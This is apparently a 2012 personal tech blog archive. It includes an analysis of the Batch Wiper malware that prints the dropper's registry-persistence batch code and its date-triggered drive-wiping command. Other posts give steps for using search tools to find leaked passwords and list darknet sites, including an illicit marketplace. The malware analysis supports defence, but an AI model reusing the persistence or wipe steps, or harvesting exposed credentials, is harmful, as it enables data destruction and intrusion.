Friday, December 28, 2012

A look into the Batch Wiper virus

The Iranian CERT reported the existence of a new targeted data wiping malware.
Although it was first thought to be another serious country-level virus, further, deeper analysis shows that it is a relatively simple attack.

GrooveMonitor.exe is the main file.
Checking the file with a Hex Editor we notice something nice.

Basically it's a self-extracting RAR file.
Opening the archive we see 3 more files, jucheck.exe, juboot.exe and SLEEP.EXE.

If we look at juboot.exe in a hex editor we find the following signature

The header belongs to "the Ultimate Packer for eXecutables".
I then opened the file with PE Explorer allowing me to see that the file is basically a Bat file with the following content:

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"

It looks like juboot.exe runs sleep for 2 and then adds registry keys ensuring that 'jucheck.exe' is executed each time the computer starts up.

In the same manner, checking jucheck.exe, it is also a batch file.
The batch file is longer this time so I'll summarize it for you. I made the source available on pastebin.

First it runs sleep for 2, just like juboot.exe.
Then it deletes the juboot.exe file and the original GrooveMonitor.exe.
The code then checks for specific dates to run. The dates are:
  • 10-12/Dec/2012
  • 21-23/Jan/2013
  • 6-8/May/2013
  • 22-24/Jul/2013
  • 11-13/Nov/2013
  • 3-5/Feb/2014
  • 5-7/May/2014
  • 11-13/Aug/2014
  • 2-4/Feb/2015
On these dates it attempts to wipe the data on the local drive using a simple "del /q /s /f" command on drives D, E, F, G, H and I.

The batch then moves on and attempts to erase the desktop in the same way.
Finally, the batch file runs "calc" (Where did this come from ?).

I haven't finished messing with the samples but as you've seen it's not a sophisticated attack and will be easy to detect and stop before any damage is done.
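A triage sketch for the indicators described above, added here as an example (it is not code from the malware or from this post's author). It parses `reg query` output for the Run value that juboot.exe creates and checks a date against the listed wipe windows; the sample registry output is constructed and the column layout of `reg query` is an assumption.

```python
import re
from datetime import date

# Wipe windows listed in the post (first and last day, inclusive).
TRIGGER_WINDOWS = [
    (date(2012, 12, 10), date(2012, 12, 12)),
    (date(2013, 1, 21), date(2013, 1, 23)),
    (date(2013, 5, 6), date(2013, 5, 8)),
    (date(2013, 7, 22), date(2013, 7, 24)),
    (date(2013, 11, 11), date(2013, 11, 13)),
    (date(2014, 2, 3), date(2014, 2, 5)),
    (date(2014, 5, 5), date(2014, 5, 7)),
    (date(2014, 8, 11), date(2014, 8, 13)),
    (date(2015, 2, 2), date(2015, 2, 4)),
]

# Persistence target written by juboot.exe, as shown in the post.
PERSISTENCE_SUFFIX = "\\system32\\jucheck.exe"

# One value line of `reg query` output. Column layout is an assumption:
# indented name, type and data separated by four spaces or a tab.
VALUE_LINE = re.compile(
    r"^\s+(?P<name>.+?)(?: {4}|\t)(?P<type>REG_[A-Z_]+)(?: {4}|\t)(?P<data>.*)$"
)

# Constructed sample output for the HKCU Run key (not taken from a real host).
SAMPLE_REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    jucheck.exe    REG_SZ    C:\WINDOWS\system32\jucheck.exe
    Updater    REG_SZ    "C:\Program Files\Example\jucheck.exe" /silent
"""


def in_trigger_window(day):
    """True if `day` falls inside one of the listed wipe windows."""
    return any(start <= day <= end for start, end in TRIGGER_WINDOWS)


def next_trigger(day):
    """First wipe day on or after `day`, or None once the last window has passed."""
    for start, end in TRIGGER_WINDOWS:
        if day <= end:
            return max(day, start)
    return None


def exe_path(data):
    """Executable path from a Run value's data, with quotes and arguments removed."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    m = re.match(r"(.+?\.exe)\b", data, re.IGNORECASE)
    return m.group(1) if m else data


def suspicious_run_values(reg_output):
    """Return (name, data) for Run values that launch jucheck.exe from system32."""
    hits = []
    for line in reg_output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue
        path = exe_path(m.group("data")).lower().replace("/", "\\")
        # The file name alone is not enough: only the system32 location
        # matches the value the post shows being written.
        if path.endswith(PERSISTENCE_SUFFIX):
            hits.append((m.group("name"), m.group("data")))
    return hits


def triage(reg_output, today):
    """Summarise persistence findings and how close the next wipe window is."""
    return {
        "persistence": suspicious_run_values(reg_output),
        "wipe_active_today": in_trigger_window(today),
        "next_wipe_day": next_trigger(today),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_REG_OUTPUT, date(2013, 1, 20)))
```

A host that shows the Run value outside a wipe window has been infected but not yet wiped, which is the case where removal still prevents data loss.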

If you want to look at the samples for yourselves, I've made them available at


Sunday, December 23, 2012

Hack the planet

Hackers (1995)

This weekend I took the time to re-watch one of the best hacker movies that I believe to be a true classic, "Hackers". The film was released in 1995, a while back and featured a cool cast list. Check it out at
It's true that the movie is outdated and the graphical effects have nothing to do with actual hacking, but the movie has great things in it even for today's viewer.
Angelina Jolie - Hackers (1995)


Angelina Jolie as a hacker

Angelina plays "Acid Burn", an "Elite" hacker showing that women can hold their own in this world.

The warning to keep away from most common passwords.

In the movie, the first hack to the Gibson mainframe used one of the four most used passwords that were Love, Sex, Secret and God.
I'm not sure if it was true back in 1995 but according to different breaches and leaks from the past year the top passwords in 2012 are actually:
  1. password
  2. 123456 /12345678 /1234 /12345
  3. qwerty
  4. dragon
  5. baseball
  6. football
  7. letmein (one of my favorites)
  8. monkey
  9. 111111
 Please let's be a bit more creative in 2013.
 Just to further emphasize the point, a scene from another great classic Spaceballs.

Online worldwide hacking community

This is only a small part of the movie but it is very much relevant in today's world.
Looking at hacker groups and the way they operate, there is no real meaning to countries and borders. Although some hacker groups are associated with countries, there is no way to determine the nationality or location of the members. A great example would be Anonymous: there are no real leaders and no one cause, allowing anyone to join and calling upon all that can to do so.

Great One liners

Some of these really caught on.
"Mess with the best Die like the rest"
"Hacking is more than just a crime, it's a survival trade"
And of course my favorite, "Hack the planet"

Have you seen the movie ?
What do you think ?

Saturday, December 15, 2012

View Twitter profile images

A while ago I noticed that Twitter changed their design for the users' images.
When previewing an image, we used to have the option to receive a picture grid of all the images the user posted. However, it seems that Twitter disabled the feature, allowing visitors to view only one image at a time.
The missing grid view is a pain and a lot of people want it back as seen in this support thread at Twitter:

So I made a decision to create an application that will let me get a profile's images easily.

The obvious way to go about programming this is using the Twitter API (after reading the documentation of course :-) ).
I noticed two Twitter API functions that allow us to reach our goal using plain and simple HTTP GET requests.

1 -
The user_timeline.xml command returns a simple XML file with the recent tweets.
The function supports additional parameters like count, which allows you to specify the max amount of tweets to receive, and trim_user, which removes appended user data.
Xml result from the Twitter user_timeline function

Notice that for each tweet we get the tweet id and the tweet text.

2 -
The show.xml function receives a tweet id and returns the XML description.
Like most functions on Twitter, this function supports additional parameters. The most important one for us is include_entities, which shows whether any media links exist in the tweet, allowing us to take the link and display it.
Xml result from the Twitter show function
When testing my application I found a big problem.
Twitter limits unauthenticated requests to 150 per hour and each of our GET requests counts as one. Reference
That means we can only check under 150 tweets for images and this really limits us.
I tried registering an application with Twitter and authenticating a user for the requests but the limit seems to be final.
The only option I saw to bypass the limit is to not use the Twitter API and to do some HTML scraping.

I created a simple form allowing the user to enter the Twitter username he wants to retrieve images of.

Once selected I used the first URL on this post figuring that for now 150 user requests per hour was enough. The result is an XML file with up to 200 status nodes.

I iterate through all of the status texts looking for links.
Twitter changes all posted links (for media files uploaded too) to the twitter format of
To check, we can use a regular expression:
Match m = Regex.Match(TweetText, @"(?<twitterURL><subdir>[^\s]*)");

If we found a link we can't just download it, since there will be a redirection from Twitter to the location of the original link. In order to capture the actual image we send an HTTP HEAD request to get the redirect URL like the following:
    var request = (HttpWebRequest)WebRequest.Create(new Uri(@"" + m.Groups["subdir"].Value));
    request.Method = "HEAD";
    // Do not follow the redirect; we only want to read its target.
    request.AllowAutoRedirect = false;
    string location;
    using (var response = request.GetResponse() as HttpWebResponse)
    {
         location = response.GetResponseHeader("Location");
    }

Upon receiving the new location we can notice that we are not redirected to the image itself but to a web page displaying the image.

Currently I support two types of images, hosted on twitter (URL starts with and contains /photo/ ) or hosted on instagram (URL starts with
To finish our scraping session we need to find on the web page the correct image tag.
For twitter, the img tag class attribute has the value "large media-slideshow-image".
For instagram, the img tag class attribute has the value "photo".

Since all of the code up to this point was self-written, I didn't want to use the HTML Agility Pack or a different third-party component. So, using regular expressions again, I wrote the GetImageTags function:
        private List<ImgTag> GetImageTags(String html)
        {
            List<ImgTag> imgTags = new List<ImgTag>();
            MatchCollection m1 = Regex.Matches(html, @"(<img.*?>.*?>)", RegexOptions.Singleline);
            foreach (Match m in m1)
            {
                string value = m.Groups[1].Value;
                ImgTag imgTag = new ImgTag();
                // Pull the src and class attributes out of the tag text.
                Match m2 = Regex.Match(value, @"src=\""(.*?)\""", RegexOptions.Singleline);
                if (m2.Success)
                    imgTag.src = m2.Groups[1].Value;
                m2 = Regex.Match(value, @"class=\""(.*?)\""", RegexOptions.Singleline);
                if (m2.Success)
                    imgTag.classAtt = m2.Groups[1].Value;
                // Keep the parsed tag so the caller can filter by class.
                imgTags.Add(imgTag);
            }
            return imgTags;
        }

If we retrieve the src attribute value, all we have left to do is download the image.

You can get the Twitter image downloader application at my codeplex project page
Take a look at the source code. Recommendations and remarks welcome.

Update 29/6/2013 : I've updated the project to support the Twitter API Ver. 1.1.
That should fix the crash issue that occurred when fetching the images.

Twitter Image Downloader

Thursday, November 29, 2012

Linksys WAG160N drops connection

The Problem

I own a Linksys WAG160N modem router that I got in Singapore. I really like it since it replaces the need for two separate devices.
For the past couple of months the device used to lose connection every day. Only a restart would reset the device and allow it to make a connection. Yesterday, no matter how many times I restarted the device, I couldn't get it to connect to the internet.

The first problem with the Linksys modem was that looking at the status it seemed that the DSL connection was fine and up.
Linksys WAG160N Status screen

On to checking the log however I saw something different.
Linksys WAG160N Log screen
The Modem would try to connect and loop around "Sending PADI 1... Sending PADI 2... Sending PADI 3... Sending PADI 4... Restart adsl"

I looked around at what the PADI thing was.

PADI stands for PPPoE Active Discovery Initiation and it seems that my modem can't really initiate.

Trying to fix

When I was checking Google for a solution, I found out that many people have the same problem. Most think the internet provider is at fault but since I hate calling tech support and usually they don't help anyway, I connected a spare modem I own using the same cables.
The new modem worked fine so this leads me to the assumption that my Modem\Router is at fault.

First thing to try is restore to Factory Defaults.
That didn't help at all; I received the same results.

Next thing I tried is to upgrade to the latest firmware.
For some reason I've noticed that a lot of people looking to upgrade the firmware, couldn't find the download link, here:
The upgrade itself is pretty simple: just download the file, unzip, go to the Firmware Upgrade screen under Administration, choose the BIN file and click upgrade.

Linksys WAG160N Firmware upgrade screen
I am however sad to say, upgrading the firmware didn't help either.

Current Solution

I had to go back to my spare Modem in order to get an internet connection however I still need to set up a network for the rest of my devices.
Hoping that the Linksys WAG160N Router part is still operational, I set up one of its Ethernet ports as a WAN port and set it up as a dialer as well.

The lucky part was I got My whole network back up. The downside is that I have two devices to connect instead of one.

Any ideas on how to fix the Linksys WAG160N Modem would be appreciated.

Friday, November 16, 2012

Capture an Entire Web Page in a C# Console Application

It's fairly simple to incorporate a browser object into your .Net Windows Forms application.
Just by adding the WebBrowser object you get the ability to display rich HTML files or browse to websites from your application.
Most programmers also notice the DrawToBitmap function that enables you to capture the browser window and save it as an image.

A few problems almost always arise; here are their solutions:

I can't find the DrawToBitmap function in IntelliSense

DrawToBitmap is part of the WebBrowserBase class. The WebBrowser class inherits from WebBrowserBase and so inherits the DrawToBitmap function.

DrawToBitmap does not work correctly or produces a blank image

A common mistake is to write your capture code this way:

In order to capture the page one must wait for the page to load.
The way to implement this is to register to the WebBrowserDocumentCompletedEventHandler.
This way an event will fire when the web page finishes loading and you will be free to capture the image.

The capture doesn't capture the whole web page.

The DrawToBitmap function only captures the image displayed on the browser itself.
In order to capture the whole web page you must make sure that it is all visible.
The way I do it is by resizing the browser to match the scroll bars which almost always match the size of the page itself.

How can I capture the page without the scroll bars

This one is a simple fix.
Just set the browser's ScrollBarsEnabled property to false.

Putting it all together, you get the following code:

Those were the basics to capture or convert a web page to an image in C# Forms but what if I want the ability to capture a web page from a console application ?

First we'll need to add some missing references that aren't included by default:

using System.Windows.Forms;
using System.Web;
using System.Drawing;
using System.Threading; 

The next thing you'll probably notice is that when trying to run the same code that worked on a Windows form you get "the current thread is not in a single-threaded apartment" exception.
A Google search will reveal a simple solution: run the browser on a separate thread and set the thread's apartment state to single-threaded apartment (STA). This should stop the exception you're seeing but will not fix all the problems.
The DocumentCompleted event we used will not fire.

Since we are using an ActiveX component (the WebBrowser), to fix the issue we have to create an STA thread that pumps a message loop.

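 public void Capture()
 {
            var th = new Thread(() =>
            {
                browser = new WebBrowser();
                browser.DocumentCompleted += wb_DocumentCompleted;
                Application.Run(); // pump a message loop so DocumentCompleted can fire
            });
            th.SetApartmentState(ApartmentState.STA); // the ActiveX control needs an STA thread
            th.Start();
 }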

To Sum it all up, I've created a project at codeplex, saving a screen capture of a webpage from a console application
Download link is:
Feel free to download the project or leave comments.

Saturday, November 10, 2012

Running a .Net 3.5 Framework on Windows 8

If you try to run a .Net 3.5 Framework application on Windows 8 you might receive an error.
When Googling, I found a fix from Microsoft (
The thing is, you must enable version 3.5 on your computer to make it work, and the good news is that it's pretty simple: just add it from the Control Panel.

In Control Panel, choose Programs and Features.
Choose Turn Windows features on or off.
Now select the Microsoft .NET Framework 3.5.1 check box.
Click OK. You're done.

Windows 8 Control Panel

Thursday, November 8, 2012

DarkNet - Part 3 - Installing Tor on Android

Installing Tor On Android and IOS

DarkNet - Part 3

 Installing Tor On Android

I love my Android devices and they are my constant companions. That is the reason I wanted to setup Tor on the device as well (To be specific, on my nexus 7 :-) )
You basically just need to go to the market and download 2 apps.
Orbot and Orweb.

Orbot: Tor on Android , is part of the Tor project and is the official port of Tor to the Android platform. This will set up the Tor proxy chain for you. All you need to do is press for a few seconds on the big power icon in the center of the screen, until it turns green.

It does include a few settings that you can play with to set it up to work with all your apps and services (via transparent proxy) but you need to have a rooted device with Superuser privileges.

If you don't have root, you'll need to work with Orbot-enabled apps like Firefox or, as I personally recommend, Orweb.

Orweb is a specialized browser to be used with Orbot.
The best thing about it is that it is pre-configured to work with Orbot.
Once Orbot is running all you need to do is run Orweb and you're set to venture into the DarkNet.

 Installing Tor On IOS

Now I have to give credit to Apple. They make great stuff and have a lot of great developers supporting them.
One of the developers is Mike Tigas.
Mike developed "Onion Browser" which can be found on iTunes for 0.99$
What's cool about the app is that it combines both the browser and the Tor network setup so you don't really have to do anything else.

It's really that simple. Check it out.

Check out more posts about the DarkNet from the main post

Wednesday, October 31, 2012

DarkNet - Part 2 - The Tor DarkNet

The Tor DarkNet

DarkNet - Part 2

Tor (The Onion Router) is a system intended to enable anonymity online. The idea is to bounce our internet traffic through a worldwide volunteer network of servers to conceal our location or usage from everyone.

From Wikipedia: "Onion Routing refers to the layered nature of the encryption service: The original data are encrypted and re-encrypted multiple times, then sent through successive Tor relays, each one of which decrypts a "layer" of encryption before passing the data on to the next relay and, ultimately, its destination. This reduces the possibility of the original data being unscrambled or understood in transit."

The Tor project was originally developed for the U.S. Navy with the purpose of securing communications over the internet. Today, Tor is used for a wide variety of purposes by regular people, the military, journalists, law enforcement officers, activists, and many others in order to keep their activities private, to stop websites from tracking them or to visit sites that are blocked by their local Internet providers.

Tor also offers the Hidden Services which basically make it possible for users to hide their locations while offering various content. This content will, however, only be available to other Tor users. This way both Content owner and people browsing are protected. This is a good way to bypass censorship in countries that monitor and limit internet users.

I won't bore you with more details on why we need Tor or why it's a good solution, and I won't go into all the technical details about how the network works. You can read more about the Tor project on their web site:

So let's get it set up

Although the first versions of TOR weren't the simplest to set up and use, for most mainstream uses today's versions are as simple as download and click.

Just go to the Tor Project download page:
and download the Tor Browser Bundle.
The good thing about the Tor Browser Bundle is that it lets you use Tor without needing to install any software. It can run off a USB flash drive, comes with a pre-configured web browser to protect your anonymity, and is self-contained. Great !
If you choose to, you can still create your own setup by downloading relevant projects from the software and services page.

After downloading the bundle just double click on Start Tor Browser.exe

It will initialize Tor by running the Vidalia program.
Once set up the Tor Browser will open and you are free to start browsing.

Notice that although it resembles the Firefox browser, it is limited.
No plugins are loaded since plugins such as Flash, RealPlayer, Quicktime, and others can be manipulated into revealing your IP address.

Now that we have Tor running we can browse sites securely, but this is not the point of this post. We want to check out the Tor Hidden Services, which is the Tor Darknet.

The hidden services sites use the .onion domain suffix, which acts just like a top level domain (.com, .org, .net, etc), but is not accessible like a normal webpage. Another thing you should notice about the .onion URLs is that they are randomly generated and do not spell out anything, so in order to find a site you need to know the exact address.
An example is the URL http://idnxcnkne4qt76tg.onion/ which is not accessible in your normal browser, but using the Tor browser you reach the Tor Project website in the Darknet, but that's not the point.

For content you can't see in the "normal" internet you need to have prior knowledge of the DarkNet, so I compiled a few links.

http://kpvz7ki2v5agwt35.onion - The Hidden Wiki - a great place to start that contains a lot of information on .onion sites including more links.

http://xmh57jrzrnw6insl.onion/ - TORCH, a tor search engine that claims to index over a million pages.

http://dppmfxaacucguzpc.onion/ - TorDir, a great tor services directory to get you started.

http://silkroadvb5piz3r.onion/ - The Silk Road - a marketplace where you can find almost anything to buy. In order to make an order however you need to get bitcoins.

Other services that are provided that aren't simple websites:
Tor Mail is a Tor Hidden Service that allows you to send and receive email anonymously, even to addresses outside Tor. Your mail address will be

http://4eiruntyxxbgfv7o.onion - Circle, used to be just TorPM for secure Messaging now they offer a few more cool services.

That should be enough to get you started, feel free to add more cool .onion links in the comments.

If you're just curious about the DarkNet and just want to take a quick peek, you can use as a proxy from normal web to the DarkNet without needing Tor itself. Take the .onion link you want to visit and append .to to the domain. It's that simple.
Keep in mind that using does not protect your privacy and that your actions will be in the open.

Check out more posts about the DarkNet from the main post

Or continue to "Installing TOR on Android and IOS" :

Monday, October 29, 2012

Let Me Google That For You

Ever had friends ask to check something for them on the internet?
Didn't you find yourself thinking, Why can't they just google that for themselves ?

Well I found a site that helps in just that case, Let Me Google That For You web site.
The url is:

You can either send the site to your friend or just send him the link generated by the site, your friend should get the point :-)

Saturday, October 27, 2012

Darknet - Part 1 - What is Darknet ?

For some reason the Darknet has become very popular in the past months. I've been getting a lot of questions at work about it so I decided to create a 2 part starter about the Darknet.

What is Darknet ?

To put it plainly, we're talking about an internet beyond what you normally have access to.
It goes by many different names, "The darkweb", "invisible web", "dark address space", "the deep web", "beneath the surface web", but they all refer to the same thing: beyond the standard, media supported, Google, Bing and Yahoo indexed internet exists a less known, harder to reach section of the internet.

Some estimate that the Dark Web is several orders of magnitude larger than the surface of the Web but I think that we need to differentiate between sections of the internet that are unreachable to most users, like private intranets or clouds and Darknet.

What's on the Darknet ? Why do we need it ?

The Darknet was made to be anonymous for the user accessing content and the host serving it. Basically you could put any content you like on it, like cnn but why would you ?  You could just go there on the normal internet.
So what can you find on the Darknet ? Porn, Hacked programs, movies, mp3's, Forums, Blogs and more.

Is it legal ?

Yes. The darknet itself and accessing it is legal.
The problem is more what you do with it and some of the content on the Darknet.
The Darknet is a safe haven for pedophiles since they can anonymously post, download and share anything.
There are also sites offering to sell illegal drugs, guns, ammunition and even hits.
Some great forums for "computer security experts" can also be found on the Darknet.
You can basically find anything you want since you are free to anonymously host and browse the content without having to worry about the local law enforcer since they can't identify the servers or their users.

Why not disable the Darknet ?
Well there are also a few good uses to the Darknet. Imagine a place where one has complete freedom of speech without having to worry about an oppressive government like in China and Iran. These countries are the ones trying to stop access to the Darknet for fear of uprisings against them.

How do I reach Darknet ?

There is no one Darknet, it's an idea. There are a few "Dark" networks out there. I'll show you the Tor Project "Dark net" and the I2P2 Network in the following parts.
So check back soon

DarkNet article parts

   Part 1 - What is Darknet ?
   Part 2 - The Tor DarkNet -
    Part 3 - Installing Tor -

Saturday, October 13, 2012

Error installing Sql server 2008 R2

I've just spent the past few hours trying to install SQL Server Express 2008 R2 on a Windows 7 Machine for work. Just setting up the install took Microsoft SQL Server 15 Min. (i3 laptop 2G Memory).

On every try, I kept getting "An error occurred creating the configuration section handler for userSettings/Microsoft.SqlServer.Configuration.LandingPage.Properties.Settings: Could not load file or assembly 'System, Version=4.0.0."

Of course I tried installing as Administrator and clearing temp directory and reinstalling.
After that failed, I updated the system with windows update and retried the former. Nothing worked.

At last I found a blog post with a simple solution at

All it said was "Solution: surprisingly easy just press Continue!"

I did and the installation worked, couldn't believe I was so stupid.
Full credit to Edward Wilde.

Friday, October 5, 2012

Facebook is annoying

I just read a nice post from Saman Shad published on the Guardian web site I thought I would share, "Facebook, can I share something with you? It's about our relationship, No wonder people are turned off these days. You've turned us into narcissists – narcissists you only want to make a buck from".
Article link:

The comment raises some good points that I agree with.

"It's getting complicated, Facebook. A billion of us use you, but we are getting increasingly frustrated with you. It's us, not you. You've made us change, and not in a good way."

Saman is right, we only used to update our status and post the occasional photo but now, we share too many things that are, sometimes, used without our direct authorization and knowledge or even against us. Furthermore we spend too much time on Facebook.

"And then there is you. Finding more and more ways to use information you collect about us to make money. Lots and lots of money."

Well what do you expect from a company? They are trying to raise their profit on the backs of the users. It's perfectly legal and makes good business sense. It does however leave us feeling a bit exploited. Maybe we would be more understanding of them, using our lives for profit, if we were receiving a fair share or at least make us feel as if we are part of the company.

"Ah, who are we kidding? It's not like you're listening. You stopped listening a long time ago. It's why your users are becoming frustrated."

Yes. Facebook is annoying, they stopped listening to the users because they have over a billion of them !!!!
To top it off, there is no way to get away from it. We're hooked !

I really want to find a different platform to use but when most (99%) of the people use Facebook, it's really really hard to leave.
I keep posting things on my Google+ but there is no one to read / comment / share, forcing me back to Facebook to get some attention.

Now to finish this post, some lol cats, feel free to share ;-)

Monday, October 1, 2012

Asus Galexy Nexus 7

For the past month I've been playing with what became my favorite gadget the Nexus 7.

The first thing you notice about the Nexus 7 is the size of course.
Below are comparison images with the HTC Desire phone, An iPad, and the Nexus 7.
The image on the left also has a standard 15.6" Lenovo laptop.

For me the 7" size was a new concept that took me under 10 minutes to get the hang of and now I simply love it.

I did ask myself. Do we really need a new form factor like the nexus and today I'm ready to say of course we do.
The laptop was used as a living room browser but when I got my first iPad, it quickly became what it was meant to be, a mobile computer for when I go to conferences or make presentations.
I used to then carry my iPad wherever I went since it was much better than my mobile phone for browsing the net when waiting for the doctor or for playing the casual game on the go. But now with the nexus 7, the iPad stays at home. It is still great for browsing the net from the living room instead of opening my laptop but the Nexus 7 is much more mobile and light weight so it replaced the iPad when outside the house.

A while back I reviewed the Motorola Xoom Android tablet and really wasn't very enthusiastic about it for the regular user but the Nexus 7 with the new Android 4.1 (Jelly Bean) will fit most users and be great for google users.

The tablet runs smoothly with great performance thanks to its Nvidia quad-core processor.
Now although there are some devices out there with better specs (like the Asus Transformer pad TF700 that I'm dying to get my hands on) the price tag on the Nexus 7 currently pushes it to the top.

Now there are a few disappointments with the Nexus 7. The ones that bothered me the most are that there is only one front facing camera, there is no SD card expansion, no 3G version and the sound levels from the speaker are low.
A friend from Google explained that the decision to go with a limited device was to keep the device costs at a minimum.

Another thing I was disappointed about was the removal of flash support and I really don't understand why there wasn't a pre-installed camera app on the device (I installed "Camera Launcher for Nexus 7").

All things considered this is a great device.

Monday, August 13, 2012

War Games

Just saw the old movie War Games from 1983.

I think it was one of the first films where I saw someone "Hack" a system.
Check out the size of the floppy disk he's using :-)

I Love this movie. What do you think ?

Saturday, August 11, 2012

Google Hacking Diggity Project

I was at DEFCON 20 a couple of weeks ago and was introduced to a few cool applications. I thought I should share them, so I'll be making some posts introducing them in the following weeks.

Today I want to introduce the Google Hacking Diggity Project,
Probably everyone reading this post  already knows about Google hacking (if not, start with, fast) but it is so much nicer to have one tool that will build all your queries for you.
Now despite the name, they do more than google.

Francis Brown and Rob Ragan have developed a search engine hacking tool arsenal that leverages Google, Bing and Shodan to quickly identify vulnerable systems or sensitive data leaks from corporate networks.

To start all you need to do is go to the link mentioned above and download search diggity from the attack tools menu.

Some cool features include PortScan

NotInMyBackyard is becoming one of my favorites, allowing to search for passwords or sensitive information intentionally or recklessly posted on the net. The tool comes with pre-built queries that make it really easy to find information on pastebin, youtube, twitter, dropbox, googledocs and more.

Just try :
  1. type 'password' in the Query appender
  2. select from the locations list (inside cloud storage).
  3. from the extensions section choose XLS and XLSX
  4. look at all the documents you can find.

Try different settings for better results.

Thursday, July 12, 2012

Yahoo! Voices accounts hacked

Yahoo! Voices is Yahoo!’s online publishing and Contributor Network.

It seems that the Yahoo! service was vulnerable to a simple database attack that leaked 453,000 unencrypted account passwords online.
The hackers, an unknown crew called D33Ds, claimed they used a union-based SQL injection technique to break into the Yahoo sub domain. They named it as a “Wake-Up call.”

I’m really surprised that Yahoo! Voices was storing unencrypted passwords in its database; unsalted one-way hashes would have been bad enough. I’m not sure if this Wake-Up call is going to work, since a former call was made only last month when LinkedIn's unsalted passwords were leaked too.

A document containing the lifted SQL structures, software variables, usernames and cleartext passwords is published on the hackers website.
The link is:

Statistics on the passwords are already available:

Total entries = 442773
Total unique entries = 342478

Top 10 passwords
123456 = 1666 (0.38%)
password = 780 (0.18%)
welcome = 436 (0.1%)
ninja = 333 (0.08%)
abc123 = 250 (0.06%)
123456789 = 222 (0.05%)
12345678 = 208 (0.05%)
sunshine = 205 (0.05%)
princess = 202 (0.05%)
qwerty = 172 (0.04%)

Top 10 base words
password = 1373 (0.31%)
welcome = 534 (0.12%)
qwerty = 464 (0.1%)
monkey = 430 (0.1%)
jesus = 429 (0.1%)
love = 421 (0.1%)
money = 407 (0.09%)
freedom = 385 (0.09%)
ninja = 380 (0.09%)
writer = 367 (0.08%)
Developers, Please take security seriously.
Everybody, Time to change our passwords.
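The storage point made above, as an added example (not code from Yahoo!, the leak, or this post's author): unsalted digests make every account that shares a password share one stored value, while a per-user salt and a slow key-derivation function do not. The account list is constructed, and the iteration count is an assumed work factor.

```python
import hashlib
import hmac
import os
from collections import Counter

# Assumed work factor for PBKDF2-HMAC-SHA256; raise it as hardware allows.
PBKDF2_ITERATIONS = 600_000

# Constructed accounts that reuse passwords from the top-10 list above.
SAMPLE_ACCOUNTS = [
    ("alice", "123456"),
    ("bob", "123456"),
    ("carol", "password"),
    ("dave", "123456"),
]


def unsalted_sha1(password):
    """Unsalted digest: the same password always yields the same value."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted, deliberately slow hash stored as algorithm$iterations$salt$digest."""
    salt = os.urandom(16)  # fresh random salt per account
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def largest_shared_group(stored_values):
    """Size of the biggest set of accounts whose stored value is identical."""
    return max(Counter(stored_values).values())


def compare_storage(accounts, iterations=PBKDF2_ITERATIONS):
    """Return (unsalted, salted) sizes of the largest group sharing a stored value."""
    unsalted = [unsalted_sha1(pw) for _, pw in accounts]
    salted = [hash_password(pw, iterations) for _, pw in accounts]
    return largest_shared_group(unsalted), largest_shared_group(salted)


if __name__ == "__main__":
    # With unsalted digests one recovered password exposes three of four accounts.
    print(compare_storage(SAMPLE_ACCOUNTS))
```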

Monday, July 9, 2012

Monday, July 2, 2012

Antec p182 front port assembly

Two or three years ago I bought an Antec P182 case. I love the case: it's extra quiet, has loads of space for all my drives and looks great.
The thing is, after 2 years of use the USB port on the front panel broke. After checking the issue on Google I had to conclude that Antec used cheap parts for the USB port.
Many P182 owners had the same problem.
I also couldn't just jump to an electronics store to replace the USB port, I had to replace the whole front port assembly since all the front ports are molded together.
Looking for replacement parts, it seemed that they were all sold out.
Even Antec support couldn't find one.

Then about 9 months after my correspondence with Antec support I got a mail informing me that they have the part available for purchase (thanks Jie Zhang) and I finally tried to install it this weekend.

When trying to remove the old front port, I couldn't reach the screws.
Now I know my cabling is awful but it seemed that I was missing something. And yes, I removed the case cages.

Luckily  I found this great video showing how to replace the front port assembly, by Puget Systems on YouTube.

Finally my case is as good as new :-)